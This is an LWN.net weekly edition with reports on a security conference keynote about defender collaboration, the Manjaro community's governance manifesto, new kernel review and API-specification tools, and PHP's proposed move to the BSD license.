|
|
Log in / Subscribe / Register

LWN.net Weekly Edition for March 26, 2026

Welcome to the LWN.net Weekly Edition for March 26, 2026

This edition contains the following feature content:

This week's edition also includes these inner pages:

  • Brief items: Brief news items from throughout the community.
  • Announcements: Newsletters, conferences, security updates, patches, and more.

Please enjoy this week's edition, and, as always, thank you for supporting LWN.net.

Comments (none posted)

Collaboration for battling security incidents

By Jake Edge
March 25, 2026

SCALE

The keynote for Sun Security Con 2026 (SunSecCon) was given by Farzan Karimi on how incident handling can go awry because of a lack of collaboration between the "good guys"—which stands in contrast to how attackers collaboratively operate. He provided some "war stories" where security incident handling had benefited from collaboration and others where it was hampered by its lack. SunSecCon was held in conjunction with SCALE 23x in Pasadena in early March.

He began with a premise that attackers, which he sometimes referred to as "hackers", collaborate, "they share tools, they share knowledge"; beyond that, they may share access to some of the members of their teams with others. On the other side, for defenders, things are different: "As effective as we are at the individual or team level, we're often victims of these organizational silos that trap us into not being able to collaborate well with each other." Specifically, "think of security versus software teams, product versus enterprise, blue team versus red team". The boundaries can be rigid: "if you're on the enterprise team and touch the scope of the product team, watch out".

He was once on a red team doing an exercise that simulated an attack by an adversary where he found a way to evade detection by disabling the endpoint detection and response (EDR) sensor system. His counterparts on the blue team were unhappy with that methodology because they wanted to use that information to see how he was attempting to evade detection; he pointed out that if attackers can disable EDR, they will. The exercise did not end particularly well, as he was called a "cheater" and a "one-trick pony", which hurt at the time and had the effect of isolating him from working with the blue team.

[Farzan Karimi]

The goal for the talk was to share some stories that demonstrated how successful collaboration on the defensive side "can transcend the attacker and lead to arrests"; on the flip side, failure to collaborate well can lead to "the attacker getting the upper hand". Karimi briefly introduced himself as the deputy chief information security officer (CISO) at Moderna, which is a Boston-based biotechnology company. He has led offensive security teams for around 15 years, including the red team at Google for Android for a few years, and before that was the founding member of a red team at the game company Electronic Arts (EA). He has spoken at the Black Hat and DEFCON security conferences over the years as well.

His theory is that "the real 0-day in companies isn't necessarily a technical flaw", it is, instead, isolation between humans in the organization. There are social pressures, such as the "fear of looking stupid" or individuals having the "hero mentality", that work against collaboration. While his stories were about security incidents, the details of those are not what is important in the talk. "It's the human behavior after the exploit, these tense situations where they escalated or de-escalated based on how the conversations went".

Story time

A talk he gave at DEFCON 33 in 2025 (YouTube video, slides) provided another example of collaboration gone awry. He presented a new technique, recursive request exploit (RRE), in the talk, but 17 hours before it began he was contacted by the legal department of a company that was affected by the exploit. The company felt that he had not done responsible disclosure, because it expected the problem to be reported to its HackerOne account, but Karimi had used email—to an address that he did not realize was not monitored.

The company had heard about his upcoming talk from a journalist and was threatening legal action if he gave the presentation. So, less than a day before the talk that he had spent months preparing for, he participated in a phone call where he explained what had happened; "it was really just a big miscommunication". He and the company had a different view of things, however. "I thought I was in the right and ethically I thought I took all the right steps, but the optics were different." When that kind of thing happens "you find yourself in a very difficult conversation and you have to find ways to de-escalate in those tense situations". He did not elaborate further, but he must have found some way to de-escalate since he gave the talk shortly thereafter.

When he was at EA, he worked on an incident regarding the virtual currency that is used in the FIFA football (soccer) video games. The currency can be used in-game to create a better team, but it can also be used to buy game merchandise; the FIFA coins have value outside of the game itself, so they are attractive to attackers. A Europe-based attacker found a vulnerability in an API for FIFA that allowed them to generate FIFA coins.

The attacker was able to create $324,000 in the virtual currency, which they immediately distributed across 25,000, seemingly random user accounts. That might seem like they were a "digital Robin Hood just giving FIFA coin back to the people", but a closer analysis showed that some of those accounts were actually controlled by the attacker. They were simply trying to obfuscate where the money was going. That really stacked the deck against EA being able to do something about the crime because it was a foreign actor stealing money and hiding where it was going.

As it turned out, though, "good collaboration across multiple teams led to this person's arrest". When the theft was happening, the EA blue team noticed that something had gone wrong and analyzed the logs to discover which APIs had been attacked. Sometimes, a blue team will just continue doing that kind of analysis, but for this event, it did something different: "they looped in my red team" and asked if the attack could be reproduced from the logs as a form of evidence that it was what the attacker had done.

The red team was able to do that and provided the information to EA's legal team, which took it to court. The judge agreed that a crime had been committed, but the attacker was based in Italy at the time. Karimi said that he was not participating at that point, but that because it was a large enough sum of money, the FBI got involved and the attacker was somehow invited to come to the US. When he did, he was met by the FBI and arrested, eventually going to prison and having to pay restitution. So that was an example of a "really good collaboration, between IR [incident response], red team, and legal".

Unplanned collaboration

His next story was an example where the collaboration was not planned, but was forced on him. He was running a red team and compromising systems, which was exactly what he should be doing, but he unknowingly "compromised" a honeypot for an advanced persistent threat (APT) that attackers had left on the company's systems. The attackers behind the honeypot realized that he was part of the red team, so they used his credentials to launch other attacks on the network—effectively disguising their activities as coming from his account and systems.

One day, an investigator showed up in his office asking some rather pointed questions about what he had been up to, since the attackers had been targeting executives in the company. She was aware that he was not actually the attacker, but "she could have talked to me as if I was the victim or if I was an idiot red-teamer that didn't care about hygiene and left my credentials everywhere". She took a different approach that has stuck with him throughout his career since: she enlisted his aid in monitoring the attackers behind the APT.

"Instead of making me feel stupid, she brought me into the broader IR [incident response] initiative, which was really magic in a way". She probably does not even remember him, he said, but her actions made a big impact on him. She asked him to keep doing his normal things, which was hard given that he knew there were two different groups of people watching his every move. He had to keep that up for around two weeks, while the forensics team would periodically ask him to access various systems so they could watch the APT team follow along shortly thereafter. That allowed the team to collect a bunch of indicators of compromise (IOCs) and it shows, he said, that incidents can also be opportunities.

Over the line

The next tale was about "one of the most humbling moments of my career". While on a red team at Microsoft, he was doing an authorized penetration test (pentest) of an HR application that stored sensitive information about employees, including their salaries. He found a vulnerability that allowed him to get access to salary information, so he stopped and reported the bug.

But, instead of stopping after compromising one record, he made a mistake and wrote a script that pulled out more than 1,000 employee salaries, "like an idiot ... in retrospect". At the time, he thought he was demonstrating the scale of impact. He was "feeling really full of myself" after finding this critical flaw, so he made a second mistake. He joked with his office-mate that he was the lowest paid security engineer at Microsoft.

His office-mate laughed, but someone down the hall heard the joke and they did not laugh. Instead they escalated it and Karimi was called into his manager's office about an hour later. There, Karimi found out that he would not be getting the promotion that he had hoped the find would solidify, but that he might lose his job over the incident, which had already gone to legal as an ethics violation. In a ten-minute span, he had gone from a high that he had found a critical flaw to realizing that his whole career might be in jeopardy.

That kind of situation goes well beyond red-team activities, he said. Anyone with administrative access should be extremely careful in determining whether to use it; "just because you can, doesn't mean you should, and, if you have to think about it, you probably shouldn't". The scope of the work may provide legal permission, "but trust is the social permission and you really need to have both in order to be successful". He did manage to keep his job, which was a positive outcome.

Entertainment conference

The final story was about the web application for ticket sales to a prominent southern California entertainment conference, which he could not name due to an agreement with the conference's legal team. There are about 70,000 attendees and some of them were losing access to their legitimately purchased tickets at the same time there was a spike in ticket sales on reseller sites. He did not work for the conference and was not hired to work on the investigation, he just happened to be attending the conference; "it's a great story of surprise collaboration".

The impact of the problem is potentially quite large, roughly $35 million in total ticket sales and lots more if the conference had to be canceled because of the problems. Ticket buyers would receive an email that contained a link to directly take them to their page in the web portal—without having to log in. He asked if attendees had ideas about what kind of vulnerability to look out for; someone correctly guessed "IDOR", which is an insecure direct object reference.

He showed a redacted version of his portal page and the URL, which had two parameters of interest: login=FKnnnnn and pwd=mmmmm where nnnnn and mmmmm are two different numbers. He asked the audience for ideas on what to change in the URL; someone noted that "FK" are his initials and that the pwd number corresponded to the registration number on the page. He agreed and noted that the registration number was an incrementing integer per registration. The number after his initials turned out to be his phone number. "All of these are guessable parameters."

It gets worse, though. The phone number was a throwaway field in the login, he said, so the primary key was just the initials. In five minutes or so he had written a proof-of-concept script to loop through all of the initials "AA" to "ZZ" trying each pwd number from one to 900,000, which showed "hundreds and hundreds of tickets" that could be compromised. He took that to the organization, which immediately stepped up to fix the vulnerability and to handle the fraudulent ticket reselling. He asked attendees what they thought he got paid for that work, which was not zero, as guessed, but slightly more—a T-shirt, he said to laughter.

"It doesn't matter whether you're a defender or you're on the offensive side, a software engineer or a sysadmin, when we stop treating each other as opponents, we win." Once that happens, "we start trusting each other more as a result". That is the thread running through all of the stories he related, he said.

The talk video is not yet available, but the YouTube livestream recording is for anyone interested in seeing the talk.

[Thanks to LWN's travel sponsor, the Linux Foundation, for its travel funding to attend SCALE in Pasadena.]

Comments (none posted)

A truce in the Manjaro governance struggle

By Joe Brockmeier
March 20, 2026

Members of the Manjaro Linux distribution's community have published a "Manjaro 2.0 Manifesto" that contains a list of complaints and a demand to restructure the project to provide a clear separation between the community and Manjaro as a company. The manifesto asserts that the project's leadership is not acting in the best interests of the community, which has caused developers to leave and innovation to stagnate. It also demands a handover of the Manjaro trademark and other assets to a to-be-formed nonprofit association. The responses on the Manjaro forum showed widespread support for the manifesto; Philip Müller, project lead and CEO of the Manjaro company, largely stayed out of the discussion. However, he surfaced on March 19 to say he was "open to serious discussions", but only after a nonprofit had actually been set up.

Manjaro is based on Arch Linux; the idea behind the distribution is to provide a user-friendly version of Arch that is focused on stability. Manjaro provides additional tools for system maintenance, and has its own software repositories. The distribution uses a rolling-release model, with three branches (stable, testing, and unstable) for users to choose from. It began as an installer for Arch Linux, created by Müller, Guillaume Benoit, and Roland Singer, which was first announced in 2011 on the Arch forum and operated as a volunteer-driven project. As the project became more popular, it began taking donations for server costs and other "special activities" in 2013. The first stable release, Version 15.09 ("Bellatrix"), was announced in September 2015.

Müller announced in 2019 that he was forming a company in Germany with Manjaro core team member Bernhard Landauer. If that was discussed with the larger Manjaro community beforehand I have not found any evidence of it. The company was set up as a Kommanditgesellschaft (KG) called "Manjaro GmbH & Co. KG". Its stated goals were to improve the Manjaro infrastructure, become self-sustaining, and to hire additional contributors. It was also announced that the new company would hold the Manjaro trademarks in the EU and US "to prevent unauthorized use of Manjaro as a brand" while ensuring that the name could "always be used freely by the community". In 2024, the company announced that Landauer was leaving "to focus on other professional endeavors", and would be replaced by Roman Gilg as the chief technical officer.

Laptop-gate

The project has had some problems with the separation between company and community before now. Manjaro had already been taking donations for various activities before the formation of the company; funds were held in Müller's bank account. After the formation of the company, the funds for its community activities were moved to Open Collective. In 2020, after the split between company and community finances, there was a controversy over the purchase of a laptop from community funds.

Jonathon Fernyhough, who passed away in 2023, was serving as treasurer for Manjaro's community donations in 2020. He said that Müller had approved the purchase of a laptop by an unidentified third person against the project's written expense policy: Fernyhough rejected the expense. That led to his leaving his post as treasurer:

Phil was unhappy about the rejection and the additional questions about how community funds would be used. As a consequence I am no longer treasurer, leaving Phil in control of all funds once again. Phil is now in a position to use community funds as he sees fit in order to move the community project in the same direction as his company.

I will still be floating around the forum but at this point Manjaro doesn't seem all that friendly any more.

A forum post by Matti Hyttinen about Fernyhough's departure asserted that the laptop purchase was a legitimate expense, but the disagreement was solely about the process involved. It also said that Fernyhough's "position within the team became untenable" because of the way that he had expressed his disagreement about the handling of the expense. Fernyhough, though, called into question the way that community funds were being used, not just the failure to follow written process. He said that there was a definite conflict of interest with Manjaro GmbH "making deals with a hardware company to optimise Manjaro for laptops, then claiming expenses from community funds for laptops from that company to do development for that company."

Manifesto

Frank Vandermeiren made the manifesto public on March 9. It states that it is meant to be used as a focus for discussion and, ultimately, a guide for an organizational restructuring of the project. It describes separating the project from the company entirely and forming a nonprofit ("Manjaro e.V.") registered association. The Manjaro for-profit company would, over time, become a downstream of the project. The document also goes into some detail about how people would join the nonprofit association, how the decision-making process would work, and so forth.

The motivation given for this is that the project has "stagnated, lost trust, lost almost all of its contributors, and even became a laughingstock for repeatedly making the same mistakes" such as failing to renew SSL certificates in a timely fashion. The manifesto refers to "project leadership", rather than naming Müller directly, but also argues that Manjaro is "being run as one individual's personal project" with everything centralized around that person; it does not require much detective work to make the connection. It claims that Müller refuses to share access to supporting infrastructure for Manjaro with the rest of the project's team.

The Manjaro name is only used for its popularity, and the community is only used as guinea pigs and as unpaid workers, with as a result that the Project is severely suffering. As an example of this, no attempt is being made to acquire any funds for the Project, and the funds owned by the Manjaro GmbH & Co KG company are not being invested into the Project, with as a result that the Project's funds have now run out, causing Manjaro's only full-time developer to lose their only source of income.

We want the Manjaro Project to be revitalized, regain respect, attract contributors, and again provide meaningful value to the Open Source community.

The developer the manifesto is referring to seems to be Mark Wagie, though he does not seem to have been receiving full-time wages; according to the expenses page on Open Collective, he has regularly received payments from the project on an almost-monthly basis, totaling about €15,000, going back to October 2023. The Open Collective project page shows that Manjaro has raised a total of €87,556.13 since it joined, and has disbursed nearly €82,000 of that; it currently has a balance of less than €6,400. The project raised about €15,600 in the last 12 months via Open Collective; it does not appear that any of the funds came from the company.

Demands

In addition to its complaints and ideas about the future, the manifesto also makes a few demands. First, it says that the project expects the company to provide a license for use of the Manjaro trademark through 2029, while retaining the right to use the mark for its own products "as long as the Manjaro GmbH & Co KG company's use of the trademark does not cause any confusion" with the projects and such offered by the nonprofit. It also demands that the company declare its willingness to yield the trademark to the nonprofit entirely after 2029 for the price of one Euro.

On top of requiring the company to hand over the trademark, the manifesto demands that any assets or infrastructure "for which the Manjaro Project is its primary user" be handed over to the nonprofit. That includes the relevant GitHub organizations, Git repositories, Manjaro forum, manjaro.org domain, and more. The company is allowed to continue using the infrastructure "but is expected to actively work towards migrating as much as reasonably possible" and compensate the nonprofit for the usage costs. Further, the nonprofit would not guarantee that any shared services would be continued; the project could take down services or replace them without consulting the company first.

Finally, it states that if Müller ignores the manifesto, or does not make a serious attempt at "negotiating an acceptable compromise solution", the supporters will take action in stages. The first stage was simply to wait "a reasonable timespan" for a response; apparently he was given a copy of the manifesto privately around February 23. The second stage is to publicly release the document, which has obviously happened, and begin a "general strike"; the supporters of the manifesto will stop their "nonessential" work on the distribution and community efforts. The third stage is to "consider forking and/or leaving" the project.

The Manjaro web site lists a core team consisting of 17 people; at least six of those team members, including Gilg, have signed on in support of the manifesto. A few of the signatories have used only their forum usernames, so it is not clear whether those people are core team members. It also seems likely that some of the team are no longer active in the project, but have not been removed from the team list.

Reactions

Since the manifesto was made public on March 9, there have been more than 220 responses in a separate thread created specifically for the discussion. The first response, from Todor Uzunov, was completely in favor of the proposal: "The project is going down the drain as it is and is in many aspects poorly maintained. I was actually looking for alternative as a main daily OS because I cannot imagine this will survive another year or two." Koshika Surasena said that he whole-heartedly agreed with "all sentiments discussed and evident", but hoped that the community had not jumped the gun by going public. He worried that a public fight might harm the project, but noted that "waiting can only go for so long, and the project is definitely in a downward trend now".

Dennis ten Hoove, one of the manifesto's signatories, elaborated on the claims that the distribution had stagnated in the past five years or so. Manjaro had once had a "sizable group of people" contributing between five and ten years ago, but only two remained active with "maybe another 2 people picking up small stuff every now and then". He complained that there are "piles of issue reports being unaddressed" and pointed out that the work on Manjaro Arm has stalled. Releases for Arm seem to have stopped in early 2023; the images offered on the download page are from the 23.02 release, which was announced in February 2023. He also voiced concern about core applications like Manjaro's package manager (Pamac) and its installer (Calamares):

If a backbone application such as Pamac or Calamares breaks the project lacks motivated people with the skills to fix it. The Pamac dev has been MIA since the end of last year and there is a reported crash which needs fixing, but it is not getting fixed because there is no backup.

The majority of users seemed to be in agreement with the need for change, but not all. User "wntr" said that the manifesto was overly aggressive and "a coup demanding an unconditional surrender. Nobody sane would agree to this." They warned that a failure to reconcile could become "a public and possibly legal battle about who gets to be king of the pile of ash".

Another user, "Kobold", felt that things were fine. "I couldn't be happier with the Distro and I don't think that I would find a good replacement for Manjaro". In a later comment, though, they pointed to a thread from November 2025 that cast some doubt on the health of the project. The topic was about updates to Manjaro's stable repository; why had it not been updated in two months? When Todor Uzunov said that the project was understaffed, Müller's reply raised more questions than it answered: "Basically Mark and I do some work for Manjaro but we don't know for how long".

In context, his comment suggests that things may not be going well for Manjaro as a business, and that perhaps Müller is feeling burned out as well. If so, that would not be surprising; burnout is a real problem for open-source maintainers as well as small-business founders. Trying to be both simultaneously is, no doubt, quite demanding. The comment, though, does little to reassure other contributors or users when it's coming from the project lead who seems to have sole access to much of the project's infrastructure.

Müller's response

His first reply to the manifesto did little to quell concerns. Müller said that he had been sent a draft of the manifesto and was told it might be formally submitted at a later date. Now that it had been posted to the forum, it seemed that the community's intentions to form a nonprofit association were serious. He said that he had no personal objections to the founding of a nonprofit, but he would not be involved in the process.

Any transfers of company assets or infrastructure require close consultation with the company and yet to be established new legal entity, in order to ensure that the interests of both parties are safeguarded as amicably and smoothly as possible. Any actions that could damage the business must be ruled out. To ensure the smooth operation of the company, assets relevant to the company will remain within the company.

Finally, I would like to note that any actions or comments that could damage the business or reputation of myself or the company should be refrained from in order to ensure a mutually agreeable process and avoid legal actions.

Gilg, who at present still seems to be with the company despite having signed on to the manifesto, thanked Müller for the reply and "general agreement" that an association should be founded. He questioned the need for consultation with the company about the transition of assets to an association. The manifesto already provides a "precise list of assets", and he did not see a problem moving them to an association. Gilg asked if Müller saw an issue with it, but he did not reply directly. Nor did he reply to any of the other issues raised in the manifesto or participate in the discussion. However, Müller had been active on the forum in other threads; on March 16, he announced a set of package updates and warned that an age-verification law in Brazil might impact Manjaro users.

An association it is

On March 17, Vandermeiren acknowledged that with the matter out in the open it is difficult for Müller to respond publicly "without pulling a boatload of haters on top of himself", but noted that he has not responded via "the back channels" either. He said that the group behind the manifesto is patient and respectful, but a decision would ultimately have to be made.

Two days later Müller replied that "it seems a bit like the 'Mutiny on the Bounty'" to him, but he was not against having a nonprofit association. He would be open to discussions with a new entity, when it exists: "From my perspective, the new entity must first be established and a transition plan drawn up before anything can actually be set in motion." He also indicated that he had spoken to Gilg, and that Gilg had expressed an interest in taking the lead in founding the nonprofit association.

The ball is in your court. Decide as a community. Go ahead and set the new entity up, then get in touch with me – otherwise, business as usual...

Vandermeiren replied that the response "gives us hope that we can work out this problem very soon". Ten Hoove said that he thought there was an agreement to move forward, and that Gilg would handle the founding of the association. "We'll do as you ask and found the e.V., then work together to facilitate the migration of community components to said e.V." He also thanked the community for its support, "we'll take it from here. And we'll keep you in the loop."

For now, it appears there will be a return to the status quo until an association is founded and negotiations begin. Müller has only indicated a willingness to have discussions, though; he has not provided a guarantee that he is willing to turn over all, or any, of the assets listed in the manifesto. We will keep an eye on any developments as they happen, and hope that the outcome is a good one that serves the Manjaro community well.

Comments (1 posted)

Development tools: Sashiko, b4 review, and API specification

By Jonathan Corbet
March 19, 2026
The kernel project has a unique approach to tooling that avoids many commonly used development systems that do not fit the community's scale and ways of working. Another way of looking at the situation is that the kernel project has often under-invested in tooling, and sometimes seems bent on doing things the hard way. In recent times, though, the amount of effort that has gone into development tools for the kernel has increased, with some interesting results. Recent developments in this area include the Sashiko code-review system, a patch-review manager built into b4, and a new attempt at a framework for the specification and verification of kernel APIs.

Sashiko

Sashiko has been slowly gaining visibility in the development community; it was formally announced by Roman Gushchin on March 17. It is based on large language models, and its job is to review patches posted to the kernel mailing lists. According to Gushchin:

In my measurement, Sashiko was able to find 53% of bugs based on a completely unfiltered set of 1,000 recent upstream issues using "Fixes:" tags (using Gemini 3.1 Pro). Some might say that 53% is not that impressive, but 100% of these issues were missed by human reviewers.

Developers have already started paying attention to the tool's reviews, with some maintainers (Andrew Morton, for example) expecting patch submitters to read and respond to those reviews.

Sashiko is based on a set of review prompts initially developed by Chris Mason, but it uses "a different multi-stage review protocol, which somewhat mimics the human review process and forces the LLM to look at the proposed change from different angles". While the only access to Sashiko is through the web interface now, the plans inevitably call for it to develop the ability to send out reviews over email.

The system is described as being "fully open-source", downloadable from a GitHub repository under the Apache-2.0 license. The ownership of the code itself has been given to the Linux Foundation. Sashiko is, of course, an open-source system that is built on a proprietary foundation (the Gemini model), so it is not truly a free-software solution. But it is a step closer to that than what we had before. And a tool like this does indeed seem to bring value to the community. While the ability of LLMs to generate kernel code is unproven at best, their ability to find obscure problems in code written by humans has been reasonably well demonstrated.

The use of tools like Sashiko will surely grow, but there is a worrisome aspect as well. Since Sashiko depends on its underlying LLM, the Sashiko service depends on some generous benefactor being willing to make the LLM time it needs available. That is happening now, while the AI bubble remains pretty well inflated and the purveyors of LLMs are trying to create dependencies on those models wherever they can. At some point, though, that generosity seems likely to come to an end. Google is nicely donating LLM time for Sashiko now, but remember that the company once freely handed out Nexus One phones to developers. Now those developers are expected to buy their own toys. One hopes that, when that history repeats itself in the LLM context, the community will not have let the ability to do its own reviews atrophy entirely.

b4 review

Konstantin Ryabitsev's b4 tool has changed kernel development in a number of ways. Maintainers depend on it to simplify the tasks of applying patches and adding review tags. Increasingly, developers (especially those who do not work full-time in the kernel community) use it for email-free patch submission. B4 can download email threads from the lore archive, making it possible to read kernel-related discussions locally without subscribing to the linux-kernel firehose. The in-development review functionality, which is not yet part of a formal b4 release, promises to further ease the patch-review process.

[b4 patch-review screen] In short, the b4 review subcommand provides a terminal-based interface to a number of patch-review operations. After enrolling a repository, the user can add one or more patch sets of interest, using message IDs, lore URLs, or by simply piping a patch into the tool from an email client. The main b4 review screen lists each in-progress patch set and its current state.

A separate review screen allows looking at each patch in a series. With a single keystroke, an entire patch series can be fed to the checkpatch.pl tool, and the results gathered for inspection. Another keystroke opens an editor with a specific patch where the reviewer can enter comments in the usual way. There are operations to add tags (Reviewed-by, for example) to the response. Inevitably, another command will feed the patch to the user's LLM-based review system of choice; Sashiko integration is underway as of this writing. Once the comments are deemed ready, they can be emailed back out with another command.

For maintainers, b4 review can bring in comments sent by others for consideration. There are also tools to apply a set of accepted patches, and to help with conflict resolution. And, at the end of it all, there is feature to automatically send "thank-you" notes to the submitters whose patches have been applied.

[b4 checkpatch screen] Intrigued, I played a bit with b4 review on the stream of documentation patches; the screenshots in this section are the result of that experiment. The tool in its current state has a lot of rough edges — it is described as being in "alpha" condition, after all. That experiment resulted in the posting of an embarrassingly mangled review that led to the discovery (and fixing) of a b4 review bug; a number of other issues were reported as well. This tool is fun to play with, but it is not yet ready for sustained production use.

It will get there, though, and it has the potential to change how a lot of people work. b4 review is not the first patch-tracking and management tool out there, but it is one that is designed to work in a distributed manner, without a central server. It is a part of Ryabitsev's effort to reduce the role of email in the development process to a sort of transport layer, and to free contributors from the need to engage directly with it if they do not wish to. The lore archive would be hard to replace, but b4 review does not otherwise depend on any system being up and available. This is a tool that is worth watching.

API specification

There has been a recurring desire for better ways to specify the interface that the kernel provides to user space — and to verify that this API actually matches the specification. A specification of this type, if it could be created and maintained, would serve a number of purposes. It would help developers ensure that patches do not change the user-space API in incompatible ways. Formal verification tools would have a better description of how the kernel is supposed to work. Development environments could use this description to assist in the writing and debugging of code. And so on.

Efforts to implement this sort of specification have typically languished, though, for a number of reasons. For example, a group including Gabriele Paoloni has been working on a specification language for some time, but has struggled to attract interested developers. A separate effort in this area, most recently posted on March 13, is a specification framework by Sasha Levin. This is a new version of work that was last covered here in 2025.

Like other attempts, Levin's work is focused on the kernel-doc comments that already describe thousands of functions within the kernel. It expands the coverage of those comments to describe, in a formal way, many aspects of a function's behavior. As an example, the documentation for this framework provides an example comment for kmalloc() (which is not part of the user-space API, but internal functions can be specified too):

    /**
     * kmalloc - allocate kernel memory
     * @size: Number of bytes to allocate
     * @flags: Allocation flags (GFP_*)
     *
     * context-flags: KAPI_CTX_PROCESS | KAPI_CTX_SOFTIRQ | KAPI_CTX_HARDIRQ
     * param-count: 2
     *
     * param: size
     *   type: KAPI_TYPE_UINT
     *   flags: KAPI_PARAM_IN
     *   constraint-type: KAPI_CONSTRAINT_RANGE
     *   range: 0, KMALLOC_MAX_SIZE
     *
     * error: ENOMEM, Out of memory
     *   desc: Insufficient memory available for the requested allocation.
     */

The first four lines are part of the existing kernel-doc format; everything after that is new. This specification describes the contexts within which kmalloc() can be called, various details about the parameters to the function, and the return value. For a rather more detailed example, see the specification for the read() system call, which goes on for several pages. It covers the parameters and (numerous) error returns, as seen above, but also includes information on signal handling, lock acquisition, side effects (modifying the file position, for example), and more.

There is an alternative format using macros rather than comments; it's not entirely clear why the second format exists. Beyond functions, there are plans for facilities to describe the arguments to ioctl() calls.

Once the specifications exist, there are a number of things that can be done with them. There is a tool to ensure, at compile time, that the specifications are consistent with the declarations of the functions they describe. The specifications are available via the debugfs filesystem in human-readable, JSON, and XML formats. There is also a run-time validation mode that checks whether functions are called in an allowed context with parameters within the given constraints, and that the return value is as specified. The cost of all this is nearly 500KB of memory used for each described function; this is not a feature one would want to enable in production kernels.

The problem with this kind of specification mechanism is always the same. Few people disagree with having precise specifications for how the code is supposed to work, but even fewer seem to be willing to put in the time to create and maintain those specifications. The work can be tedious and tends not to astonish users with exciting new features; it is the sort of thing that people generally need to be paid to do. LLMs can be pressed into service for some of this work (as was done for this series), but humans still need to be involved to be sure that the results are accurate — and to maintain them going forward. Creating this sort of framework is feasible from a technology point of view, but success in this area will also depend on solving the social problem of creating and maintaining the specifications themselves.

Comments (2 posted)

A PHP license change is imminent

By Joe Brockmeier
March 24, 2026

PHP's licensing has been a source of confusion for some time. The project is, currently, using two licenses that cover different parts of the code base: PHP v3.01 for the bulk of the code and Zend v2.0 for code in the Zend directory. Much has changed since the project settled on those licenses in 2006, and the need for custom licensing seems to have passed. An effort to simplify PHP's licensing, led by Ben Ramsey, is underway; if successful, the existing licenses will be deprecated and replaced by the BSD three-clause license. The PHP community is now voting on the license update RFC through April 4, 2026.

In its early days, the PHP project changed its licensing with some frequency: between 1995 and 2006, PHP changed licenses or modified the terms of its custom licenses seven times. Initially, PHP was distributed under the GPLv2. Then PHP 3, released in 1998, was shipped under a dual-license scheme; it was available under the GPLv2 and a new PHP License based on the Apache License 1.0. This was chosen by PHP creator Rasmus Lerdorf to make PHP more palatable to commercial interests:

PHP2 has gotten quite a few nibbles from various commercial interests over the past year. The GPL, plus my own stubbornness killed most of them. PHP, if I can help it, will always be free. But, I am not against letting commercial entities take a shot at a commercial version as long as the terms are such that the major contributors don't feel cheated.

The first iteration of the custom license, though, had a clause that required written permission from the PHP development team for commercial redistribution. That proved unworkable, so the clause was stricken for the PHP 3.0.14 release. The LICENSE file in that release did not carry a version number.

PHP 4.0, released in May 2000, was a major overhaul; it included the Zend Engine, described at the time as a full rewrite of the PHP scripting engine, written by Zeev Suraski and Andi Gutmans. The pair had formed a company, Zend Technologies, which sought to commercialize the Zend Engine separately from PHP; it provided a grant to allow the Zend Engine to be integrated into PHP and guaranteed that it would remain under the Zend license or another license consistent with the Open Source Definition (OSD) from the Open Source Initiative (OSI), even though the Zend license itself is not OSI-approved. Thus, the PHP project picked up the Zend license for code in the Zend directory of its source tree. PHP 4.0 also dropped the GPLv2 altogether in favor of the PHP License version 2.02.

PHP's licenses were updated a few more times; the PHP 3.0 license was approved by the OSI, but the license received a small final set of changes that pushed it to version 3.01. The changes only modified the copyright years and rephrased how the acknowledgements should be phrased for PHP and Zend, they did not impact the rights granted in any way. The reasons for that change are lost to the mists of time, but that version was never approved by the OSI. The license text has proven to be a problem because it only appears to apply to software shipped by the "PHP Group". Confusingly, the PHP Group does not seem to be an actual legal entity, but a list of ten people involved in PHP development early on. Some contend that software from parties other than the PHP Group cannot use it as a valid license. That has caused headaches for other projects, such as Debian. Ramsey has covered the history of PHP's licensing in the RFC for those who want even more detail.

Proposal

Ramsey opened discussion on the RFC in July 2025; he proposed replacing both of the existing licenses with the three-clause BSD license beginning with the next major release, PHP 9.0. He had enlisted an expert for the exercise; he said he was working with Pamela Chestek, chair of OSI's license committee, for legal questions and concerns.

He said that he had already spoken with all the members of the PHP Group and each member had already voiced approval for the change. He had also gotten approval from Perforce Software, which had acquired Zend in 2019 as part of the portfolio owned by Rogue Wave Software (which had, itself, acquired Zend in 2015). One might wonder about all of the individual contributors who had submitted code to PHP over the years: don't they also have to approve a license change? In the RFC, Ramsey argues that is not the case. PHP has not required a contributor-license agreement (CLA) to assign copyright to the project, and there is no implicit transfer of copyright to the project. However, there is an implied assignment of license:

When someone contributes to an open source project, they own the copyright on their contributions, but unless they specify a different license covering their contributions (which is wholly valid, with examples including Derick Rethans's timelib, which is bundled within the PHP source code), it is implied they are granting use of their contributions under the same license terms as the project.

[...] Typically, when changing the license on an open source project, one must gain approval from all copyright owners, since the rights granted might change under the terms of the new license. However, as described in this section and in other places in this document, changing to the Modified BSD License does not change any of the rights granted by contributors who are not the PHP Group or Perforce Software.

Even though the RFC asserts that the project does not require permission, it says that the discussion would remain open for at least six months "as a courtesy" to ensure that interested parties had an opportunity to respond. Ramsey provided updates and reminded people that the topic was still under discussion a few times since the RFC's announcement in July; thus far, it does not seem that anyone has objected.

A few people have had questions, of course. Rethans wondered "why wait until (specifically) PHP 9, and not PHP-next (the one after 8.5)?" Ramsey said that there were no technical or legal reasons; it just seemed like the PHP 9 release would be the right time to make the change. If others thought 8.6 would be the appropriate time, that was also fine. The RFC was later updated to change the proposal to the "next version" of PHP.

Peter Kokot suggested that GPL-compatibility should be "just slightly clarified to make PHP usage simpler in the future for cases when GPL-licensed software is involved". He pointed out that PHP has the option to be linked to two libraries that use GPLv3: the GNU Readline Library and the GNU dbm (GDBM) database-function library. He was thinking of deprecating build-time linking options for those libraries to make PHP "worry-free for packagers". Ultimately the possibility to link to GDBM and Readline would be removed entirely. Ramsey said that the change would make things simpler for packagers:

For those who are packaging PHP and linking against GPL libraries, the current PHP License, version 3.01, presents an incompatibility that cannot be resolved because of the additional restrictions it places on users. However, under the Modified BSD License, there is no incompatibility, as long as the combined package is released under the terms of the GPL.

On March 14, Ramsey announced that he was opening voting on the RFC. The votes are public and tallied on the PHP wiki in the body of the RFC. It's unclear how many eligible voters there are in total currently: in 2019 there were 180 people with voting privileges. At the moment, 47 people have voted in favor, two have voted to abstain; even though the early results seem overwhelmingly positive it is not yet certain the proposal will pass. If it does, though, it is largely thanks to the work that Ramsey has put in over the past few years in behind-the-scenes conversations, getting approvals, and shepherding the RFC to a final vote.

Comments (3 posted)

More efficient removal of pages from the direct map

By Jonathan Corbet
March 25, 2026
